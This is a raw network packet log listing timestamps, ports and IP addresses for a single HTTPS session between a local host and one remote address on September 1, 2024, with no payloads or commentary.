Sep 1, 2024 18:28:00.111293077 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.111315012 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.111334085 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.111884117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.111938000 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.150728941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.150767088 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.150782108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.150794029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.150815964 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.196835995 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.196894884 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.196897984 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.196906090 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.196928024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.197046041 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197092056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.197102070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197138071 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.197243929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197285891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.197525024 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197561979 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197570086 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.197573900 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197599888 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.197913885 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197948933 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197958946 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.197962999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.197989941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.198307991 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.198348045 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.198353052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.198399067 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.198479891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.198520899 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.199074984 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.199124098 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.199261904 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.199331999 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.200062037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.200120926 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.200246096 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.200290918 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.200548887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.200577021 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.200598001 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.200603008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.200613976 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.200754881 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.200814009 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.200819969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.200875044 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.201005936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.201050997 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.201603889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.201651096 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.201685905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.201746941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.201963902 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.201993942 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.202003956 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.202008009 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.202030897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.202488899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.202532053 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.202537060 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.202574968 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.202625990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.202671051 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.202788115 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.202836037 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.202934980 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.202975988 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.203151941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.203181028 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.203197956 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.203202009 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.203224897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.203250885 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.203283072 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.203299046 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.203304052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.203332901 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.241491079 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.241537094 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.241544962 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.241585970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.241697073 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.241740942 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.287589073 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.287626028 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.287640095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.287647009 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.287674904 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.287864923 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.287894964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.287909985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.287915945 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.287957907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.288176060 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.288203955 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.288223982 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.288228035 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.288239956 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.288537025 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.288561106 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.288573980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.288579941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.288605928 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.289288044 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.289313078 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.289330006 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.289334059 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.289359093 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.290651083 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.290698051 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.290704012 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.290741920 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.290807962 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.290853977 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.291048050 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291099072 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.291323900 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291376114 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.291484118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291512012 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291529894 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.291537046 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291547060 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.291732073 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291774035 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.291779041 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291822910 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.291924953 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.291975021 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.292408943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.292464972 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.292614937 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.292663097 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.292706966 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.292749882 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.292865992 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.292922974 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.293123960 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.293154001 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.293176889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.293180943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.293188095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.293190002 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.293221951 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.293236971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.293499947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.293536901 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.293575048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.293622017 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.293837070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.293886900 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.294017076 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.294044018 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.294056892 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.294061899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.294080019 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.294349909 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.332362890 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.332426071 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.332549095 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.332598925 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.378978968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379020929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379163980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.379163980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.379173994 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379203081 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379247904 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.379254103 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379292965 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.379369020 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379417896 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.379475117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379520893 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.379637003 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379689932 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.379834890 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.379890919 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.380072117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.380151033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.380198956 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.380229950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.380263090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.380269051 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.380278111 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.381418943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.381453037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.381505013 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.381510973 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.381613016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.381656885 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.381661892 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.381706953 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.381891966 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.381936073 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.382488012 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.382538080 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.382663965 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.382714033 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.382855892 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.382906914 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.382965088 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.383008003 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.383078098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.383125067 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.383304119 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.383358002 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.383608103 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.383639097 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.383658886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.383666039 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.383682966 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.383987904 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384021997 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384031057 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384035110 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384047031 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384062052 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384092093 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384095907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384135962 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384356022 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384403944 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384627104 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384654999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384671926 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384675980 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384697914 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384854078 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384893894 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.384901047 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.384942055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.385766983 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.422884941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.422938108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.423067093 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.423121929 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.470452070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.470503092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.470503092 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.470513105 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.470542908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.470549107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.470587969 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.470665932 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.470695019 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.470711946 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.470719099 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.470730066 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471024990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471069098 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471072912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471117020 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471211910 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471239090 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471255064 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471260071 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471286058 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471306086 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471457005 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471499920 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471626043 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471662998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.471911907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.471961975 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.472098112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.472142935 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.472374916 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.472413063 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.472522020 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.472569942 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.473664045 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.473696947 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.473711967 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.473716021 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.473725080 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.473743916 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.473766088 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.473768950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.474076033 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.474114895 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.474121094 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.474158049 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.474639893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.474674940 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.474688053 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.474692106 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.474718094 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.474739075 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.474958897 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.474992037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475001097 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.475004911 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475025892 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475032091 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.475055933 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.475059032 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475084066 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.475274086 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475313902 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475325108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.475328922 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475359917 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.475852013 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475894928 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.475898981 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.475933075 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.476046085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.476082087 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.476093054 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.476097107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.476115942 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.476124048 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.476147890 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.476157904 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.476166964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.476172924 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.476214886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.514053106 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.514097929 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.514107943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.514153957 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.561206102 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561249018 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.561254978 CEST	56171	443	192.168.2.4	84.32.84.144
